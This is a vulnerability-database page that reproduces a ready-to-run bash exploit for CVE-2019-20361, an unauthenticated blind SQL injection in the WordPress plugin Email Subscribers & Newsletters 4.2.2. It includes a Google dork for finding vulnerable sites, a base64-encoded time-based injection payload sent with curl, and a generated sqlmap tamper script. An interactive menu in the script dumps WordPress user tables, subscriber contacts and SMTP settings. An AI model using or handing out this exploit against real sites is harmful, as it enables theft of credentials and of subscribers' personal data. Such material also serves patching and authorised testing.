Lucene search
K

WordPress Email Subscribers & Newsletters 4.2.2 Plugin - (hash) SQL Injection (Unauthenticated)

🗓️ 27 Jul 2020 00:00:00Reported by [email protected]_ESECType 
zdt
 zdt
🔗 0day.today👁 509 Views

WordPress Email Subscribers & Newsletters 4.2.2 Plugin SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2019-20361
8 Jan 202000:00
attackerkb
GithubExploit
Exploit for SQL Injection in Icegram Email_Subscribers_\&_Newsletters
18 Mar 202100:22
githubexploit
Circl
CVE-2019-20361
9 Dec 202015:35
circl
CNVD
WordPress Email Subscribers & Newsletters SQL Injection Vulnerability
8 Jan 202000:00
cnvd
CVE
CVE-2019-20361
8 Jan 202005:03
cve
Cvelist
CVE-2019-20361
8 Jan 202005:03
cvelist
Exploit DB
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
26 Jul 202000:00
exploitdb
Metasploit
WordPress Email Subscribers and Newsletter Hash SQLi Scanner
9 Dec 202017:41
metasploit
NVD
CVE-2019-20361
8 Jan 202006:15
nvd
OSV
CVE-2019-20361
8 Jan 202006:15
osv
Rows per page
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Exploit Author: [email protected]_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

main () {
	header
	if [ "$#" -ne 1 ]; then
			echo "Usage	: bash CVE-2019-20361.sh [BASE URL]"
			echo "Example	: bash CVE-2019-20361.sh http://127.0.0.1/"
			exit
	fi
	
	url=$1
	echo ' Target URL : ' "$url"
	echo ' Generating sqlmap tamper script in /tmp'
	gen_sqlmap_tamper
	sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
	echo ' SQLMap base command : ' "$sqlmap_cmd"

	while true
	do
		 sleep 1
		 echo ''
		 echo " Possible choices: " 
		 echo ''
		 echo "  0) Exit"
		 echo "  1) Simple vulnerability test SLEEP(5)" 
		 echo "  2) Vulnerability test with SQLMap "
		 echo "  3) Get WP users data"
		 echo "  4) Get subscribers information" 
		 echo "  5) Get 'Simple WP SMTP' settings"
		 echo ''
		 echo -n ' Choice number => '
		 read n

		 case $n in 
		 0) exit ;;
		 1) echo 'Testing SLEEP(5)...'
				 { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; 
		 2) $sqlmap_cmd ;;
		 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
		 4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
		 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
		 *) echo "Invalid option" ;;
 		 esac 
	done

}

header () {

echo ''
echo ' ################################################################################################';
echo ' #             ___         ___         ___         ___      ___                                 #';
echo ' #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #';
echo ' #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #';
echo ' #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #';
echo ' #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #';
echo ' #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #';
echo ' #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #';
echo ' #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #';
echo ' #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #';
echo ' #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #';
echo ' #            \/__/       \/__/       \/__/       \/__/                                         #';
echo ' #                                                 ___         ___         ___         ___      #';
echo ' #                                                /\  \       /\  \       /\  \       /\  \     #';
echo ' #                                               /::\  \     /::\  \     /::\  \     /::\  \    #';
echo ' #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #';
echo ' # Email Subscribers & Newsletters < 4.3.1     /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #';
echo ' #   Unauthenticated Blind SQL Injection      /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #';
echo ' #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #';
echo ' #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #';
echo ' #                                               \:\__\      \::/  /     \:\__\      \:\__\     #';
echo ' #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #';
echo ' #                                                                                              #';
echo ' #                                                                                              #';
echo ' ################################################################################################';
echo ''
}

raw_commands () {

	echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"  '","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |  base64 -w 0

		{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'

		sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3

		-T wp_users,wp_usermeta --dump 
		-T wp_ig_contacts --dump
		--sql-query 'select * from wp_options where option_name="swpsmtp_options"'

}

gen_sqlmap_tamper () {

		touch /tmp/__init__.py

		cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python

import base64
import urllib

def tamper(payload, **kwargs):

#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'

	param  = '{"contact_id":"'
	param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
	param += '","campaign_id":"100","message_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'

	#print(param%payload)
	return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}

main [email protected]

#  0day.today [2020-07-27]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation